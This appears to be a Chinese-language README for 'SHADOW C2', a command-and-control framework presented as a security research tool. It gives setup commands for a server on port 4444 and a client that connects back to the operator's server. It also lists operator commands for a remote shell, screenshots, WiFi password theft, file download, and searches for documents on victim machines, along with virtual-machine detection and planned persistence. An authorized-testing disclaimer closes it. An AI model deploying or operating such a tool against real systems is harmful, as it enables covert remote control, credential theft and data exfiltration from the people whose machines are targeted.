高级命令控制框架 | 安全研究工具
graph TD
A[SHADOW C2] --> B[服务端]
A --> C[客户端]
B --> D[命令控制]
B --> E[数据处理]
C --> F[命令执行]
C --> G[数据收集]
D --> D1[客户端管理]
D --> D2[命令分发]
D --> D3[结果显示]
E --> E1[加密通信]
E --> E2[数据存储]
F --> F1[Shell执行]
F --> F2[文件操作]
F --> F3[信息收集]
G --> G1[系统信息]
G --> G2[屏幕截图]
G --> G3[WiFi密码]
sequenceDiagram
participant Client
participant Server
participant Operator
Client->>Server: 1. 初始化连接
Server->>Client: 2. 建立加密通道
Note over Client,Server: AES-CBC + HMAC
loop 命令执行
Operator->>Server: 发送命令
Server->>Client: 加密传输
Client->>Server: 返回结果
Server->>Operator: 显示结果
end
- 交互式Shell
- 命令执行
- 实时响应
- 多客户端管理
- 系统信息
- 屏幕截图
- WiFi密码
- 进程列表
- 文件上传/下载
- 文件搜索
- 名称匹配
- 内容搜索
- 大小过滤
- 类型筛选
- AES-CBC 加密
- HMAC 认证
- 虚拟机检测
- 权限控制
# 安装依赖
pip install pycryptodome
# 启动服务器
python server.py -H 0.0.0.0 -p 4444# 安装依赖
pip install -r requirements.txt
# 连接服务器
python client.py -s <server_ip> -p 4444# 查看客户端列表
C2> list
# 进入交互式Shell
C2> shell client_1
# 执行系统命令
C2> cmd client_1 whoami# 获取系统信息
C2> sysinfo client_1
# 屏幕截图
C2> screenshot client_1
# 获取WiFi密码
C2> wifi client_1# 文件上传
C2> upload client_1 /path/to/local/file
# 文件下载
C2> download client_1 C:\path\to\remote\file
# 文件搜索
C2> search client_1 -p C:\Users -n *.doc -s 1MB-10MBsearch <client_id> [选项]
选项:
-p, --path <path> # 搜索路径
-n, --name <pattern> # 文件名模式
-d, --depth <num> # 搜索深度
-s, --size <range> # 大小范围
-e, --ext <exts> # 扩展名
-c, --content <text> # 内容搜索graph LR
A[明文数据] --> B[JSON编码]
B --> C[AES-CBC加密]
C --> D[HMAC签名]
D --> E[Base64编码]
E --> F[网络传输]
shadow-c2/
├── server/
│ └── server.py # 服务器端
├── client/
│ ├── client.py # 客户端
│ └── requirements.txt # 依赖
└── README.md
- Web管理界面
- 插件系统支持
- 多协议通信
- 代理功能
- 持久化机制
- Python 3.7+
- Windows/Linux
- 管理员权限(部分功能)
- 在安全的网络环境使用
- 定期更换加密密钥
- 及时清理敏感数据
- 遵守相关法律法规
本工具仅供安全研究和授权测试使用。使用者需遵守当地法律法规,对使用过程产生的任何问题负责。
- 基础功能实现
- 加密通信支持
- 文件操作优化
- 错误处理完善
荷花哥
Made with ❤️ for Security Research